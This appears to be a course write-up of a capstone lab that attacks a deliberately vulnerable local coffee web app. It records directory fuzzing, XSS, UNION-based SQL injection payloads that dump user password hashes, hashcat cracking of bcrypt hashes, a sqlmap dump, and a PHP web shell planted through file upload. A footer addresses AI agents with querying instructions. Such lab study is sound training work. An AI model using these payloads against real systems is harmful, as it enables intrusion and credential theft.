# Web App - Capstone Practical Lab Analyze and pentest the web application by finding all the impactful issues. * Run BurpSuite to capture all the traffic and browse to `http://localhost/capstone/` ```bash ffuf -u http://localhost/capstone/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php -recursion ffuf -u http://localhost/capstone/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php -recursion -fs 274 ``` ```bash ________________________________________________ :: Method : GET :: URL : http://localhost/capstone/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Extensions : .php :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 274 ________________________________________________ admin [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 1ms] [INFO] Adding a new job to the queue: http://localhost/capstone/admin/FUZZ assets [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 2ms] [INFO] Adding a new job to the queue: http://localhost/capstone/assets/FUZZ auth.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 7ms] [Status: 200, Size: 14261, Words: 2458, Lines: 109, Duration: 116ms] coffee.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 18ms] db.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 21ms] index.php [Status: 200, Size: 14261, Words: 2458, Lines: 109, Duration: 69ms] logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 12ms] index.php [Status: 200, Size: 14261, Words: 2458, Lines: 109, Duration: 75ms] init.php [Status: 200, Size: 238, Words: 22, Lines: 8, Duration: 155ms] [INFO] Starting queued job on target: http://localhost/capstone/admin/FUZZ admin.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 28ms] admin.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms] [INFO] Starting queued job on target: http://localhost/capstone/assets/FUZZ :: Progress: [9228/9228] :: Job [3/3] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: ``` * Sign up with a weak password and login * The message is reflected on the URL ```bash http://localhost/capstone/index.php?message=You%20successfully%20logged%20in! ``` Try some HTML injection and XSS * 📌 **Reflected XSS** is present ```bash http://localhost/capstone/index.php?message= ``` Go to `http://localhost/capstone/coffee.php?coffee=1` * Try XSS it in the **Add rating** comment - `` * Refresh the page to test the stored XSS * 📌 **Stored XSS** is present Try SQL injection in the `http://localhost/capstone/coffee.php?coffee=1` URL ```bash http://localhost/capstone/coffee.php?coffee=1%27%20or%201=1# # informational issue http://localhost/capstone/coffee.php?coffee=1%27%20or%201=1--%20- # Success - Returns all coffees http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,null,null,null,null,null,null--%20- # Success - UNION select http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,TABLE_NAME,%27string%27,null,null,null,null%20FROM%20INFORMATION_SCHEMA.TABLES--%20- # Success - tables http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,COLUMN_NAME,%27string%27,null,null,null,null%20FROM%20INFORMATION_SCHEMA.COLUMNS--%20- # Success - columns: user_id, username, password, etc http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20FROM%20users--%20- # Success - got users with passwords hash ``` * 📌 SQLi * `=1' or 1=1-- -` * `=1' union select null,null,null,null,null,null,null-- -` * `=1' union select null,TABLE_NAME,'string',null,null,null,null FROM INFORMATION_SCHEMA.TABLES-- -` * `=1' union select null,COLUMN_NAME,'string',null,null,null,null FROM INFORMATION_SCHEMA.COLUMNS-- -` * `=1' union select null,username,password,null,null,null,null FROM users-- -` ```bash # Users hashes jeremy: $2y$10$F9bvqz5eoawIS6g0FH.wGOUkNdBYLFBaCSzXvo2HTegQdNg/HlMJy jessamy: $2y$10$meh2WXtPZgzZPZrjAmHi2ObKk6uXd2yZio7EB8t.MVuV1KwhWv6yS ray: $2y$10$cCXaMFLC.ymTSqu1whYWbuU38RBN900NutjYBvCClqh.UHHg/XfFy bob: $2y$10$ojC8YCMKX2r/Suqco/h.TOFTIaw5k3Io5FVSCeWjCCqL8GWwmAczC maria: $2y$10$EPM4Unjn4wnn4SjoEPJu7em6OLISImA50QS3T1jCLyh48d7Pv6KBi amir: $2y$10$qAXjb233b7CMHc69CU.8ueluFWZDt9f08.XYJjsJ.EfC/O5JGSOqW xinyi: $2y$10$37gojoTFmj86E6NbENGg9e2Xu2z6OKKSgnjYxDkXJn/8dvSk2tKfG kofi: $2y$10$5sVvPfZOjzRTSeXJtQBGc.CfsDEwvITNkIg2IF9jSBhZZ1Rq.IK3. ``` * Try to crack some of the hashes with mode `bcrypt $2*$, Blowfish (Unix)` ```bash nano hash.txt $2y$10$F9bvqz5eoawIS6g0FH.wGOUkNdBYLFBaCSzXvo2HTegQdNg/HlMJy $2y$10$meh2WXtPZgzZPZrjAmHi2ObKk6uXd2yZio7EB8t.MVuV1KwhWv6yS ``` ```bash hashcat -m 3200 hash.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt hashcat -m 3200 hash.txt /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt --show $2y$10$F9bvqz5eoawIS6g0FH.wGOUkNdBYLFBaCSzXvo2HTegQdNg/HlMJy:captain1 ``` * Run `sqlmap` on the `http://localhost/capstone/coffee.php?coffee=1` request * Get it from BurpSuite ```bash nano coffee.txt GET /capstone/coffee.php?coffee=1 HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=6f9efce7c39046143f27daa3f9d80638 Connection: keep-alive ``` ```bash sqlmap -r coffee.txt -T users --dump ``` ```bash # sqlmap result Database: peh-capstone-labs Table: users [9 entries] +---------+--------+--------------------------------------------------------------+----------+ | user_id | type | password | username | +---------+--------+--------------------------------------------------------------+----------+ | 1 | admin | $2y$10$F9bvqz5eoawIS6g0FH.wGOUkNdBYLFBaCSzXvo2HTegQdNg/HlMJy | jeremy | | 2 | admin | $2y$10$meh2WXtPZgzZPZrjAmHi2ObKk6uXd2yZio7EB8t.MVuV1KwhWv6yS | jessamy | | 3 | admin | $2y$10$cCXaMFLC.ymTSqu1whYWbuU38RBN900NutjYBvCClqh.UHHg/XfFy | raj | | 4 | user | $2y$10$ojC8YCMKX2r/Suqco/h.TOFTIaw5k3Io5FVSCeWjCCqL8GWwmAczC | bob | | 5 | user | $2y$10$EPM4Unjn4wnn4SjoEPJu7em6OLISImA50QS3T1jCLyh48d7Pv6KBi | maria | | 6 | user | $2y$10$qAXjb233b7CMHc69CU.8ueluFWZDt9f08.XYJjsJ.EfC/O5JGSOqW | amir | | 7 | user | $2y$10$37gojoTFmj86E6NbENGg9e2Xu2z6OKKSgnjYxDkXJn/8dvSk2tKfG | xinyi | | 8 | user | $2y$10$5sVvPfZOjzRTSeXJtQBGc.CfsDEwvITNkIg2IF9jSBhZZ1Rq.IK3. | kofi | | 9 | user | $2y$10$C2L29W3hbwvK..KvPltBmO5aL8CD74yByBzat6GEMmJA2ah15JvtS | sys | +---------+--------+--------------------------------------------------------------+----------+ ``` 📌 Creds - `jeremy`:`captain1` * Login as `jeremy` * Browse to `http://localhost/capstone/admin/admin.php` Try to add a new coffee and upload a file. * Find the `POST` request, send to Repeater and try to upload a shell ```bash Content-Disposition: form-data; name="image"; filename="logo.php" Content-Type: image/png PNG ... ``` * The file has been uploaded successfully * Open `http://localhost/capstone/assets/12.php` * `http://localhost/capstone/assets/12.php?cmd=whoami` * 📌 Insecure file upload successful ![](/files/IOTc52bYmvKg15Ss35Ti) *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.syselement.com/tcm/courses/peh/6-webapp/9-web-capstone-lab.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.